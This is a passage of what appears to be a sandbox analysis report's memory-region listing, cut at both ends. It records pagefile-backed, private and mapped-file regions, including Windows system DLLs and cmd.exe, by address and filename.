= "pagefile_0x00000000003d0000" filename = "" Region: id = 7507 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7508 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7509 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7510 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7511 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7512 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7532 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7533 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7534 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7535 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7536 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7537 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7538 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7539 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7540 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7541 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7542 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7543 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7544 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7545 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7546 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7547 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7548 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7549 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7550 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7551 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7552 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7553 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7554 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7555 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7556 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7557 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7558 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7559 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7560 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7561 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7562 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7563 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7564 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7565 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7566 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7567 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7568 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7569 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7570 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7630 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7678 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7704 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7705 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7706 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7707 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7708 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7709 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7776 start_va = 0x3d0000 end_va = 0x3d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7777 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 7778 start_va = 0x17e0000 end_va = 0x189ffff entry_point = 0x17e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 9689 start_va = 0x18a0000 end_va = 0x18fbfff entry_point = 0x18a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 9707 start_va = 0x18a0000 end_va = 0x18fbfff entry_point = 0x18a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 9708 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 9709 start_va = 0x18a0000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 9710 start_va = 0x18a0000 end_va = 0x197efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018a0000" filename = "" Region: id = 9711 start_va = 0x1a40000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 9712 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 9713 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 9714 start_va = 0x14b0000 end_va = 0x14b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014b0000" filename = "" Region: id = 9715 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9716 start_va = 0x14c0000 end_va = 0x14c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 9717 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 9718 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x1980000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 9719 start_va = 0x1990000 end_va = 0x1991fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001990000" filename = "" Region: id = 9720 start_va = 0x1a80000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 9721 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 9722 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 9723 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 9724 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 9725 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 9726 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 9727 start_va = 0x1980000 end_va = 0x1983fff entry_point = 0x1980000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 9728 start_va = 0x1b80000 end_va = 0x1f72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 9758 start_va = 0x19a0000 end_va = 0x19befff entry_point = 0x19a0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 9791 start_va = 0x19c0000 end_va = 0x19c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019c0000" filename = "" Region: id = 9792 start_va = 0x1f80000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 9793 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 9794 start_va = 0x2080000 end_va = 0x2180fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 9795 start_va = 0x2080000 end_va = 0x2180fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 9796 start_va = 0x2080000 end_va = 0x2180fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 9797 start_va = 0x6f580000 end_va = 0x6f588fff entry_point = 0x6f580000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 9836 start_va = 0x70560000 end_va = 0x705cffff entry_point = 0x70560000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 9854 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9855 start_va = 0x2080000 end_va = 0x217ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 9856 start_va = 0x705d0000 end_va = 0x705dafff entry_point = 0x705d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 9857 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 9858 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 9859 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9860 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9861 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9862 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9863 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9864 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9865 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9866 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9867 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9868 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9869 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9870 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10351 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 10352 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10353 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10354 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10355 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10356 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10357 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10358 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10359 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10360 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10361 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10362 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10672 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 10673 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10674 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10675 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10676 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10677 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10678 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10679 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10680 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10681 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10682 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10683 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11109 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 11110 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11111 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11112 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11113 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11114 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11115 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11116 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11117 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11118 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11119 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11120 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11546 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 11547 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11548 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11549 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11550 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11551 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11552 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11553 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11554 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11555 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11556 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11557 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11901 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 11902 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11903 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11904 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11905 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11906 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11907 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11908 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11909 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11910 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11911 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11912 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12474 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 12475 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12476 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12477 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12478 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12479 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12480 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12481 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12482 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12483 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12484 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12485 start_va = 0x1980000 end_va = 0x1980fff 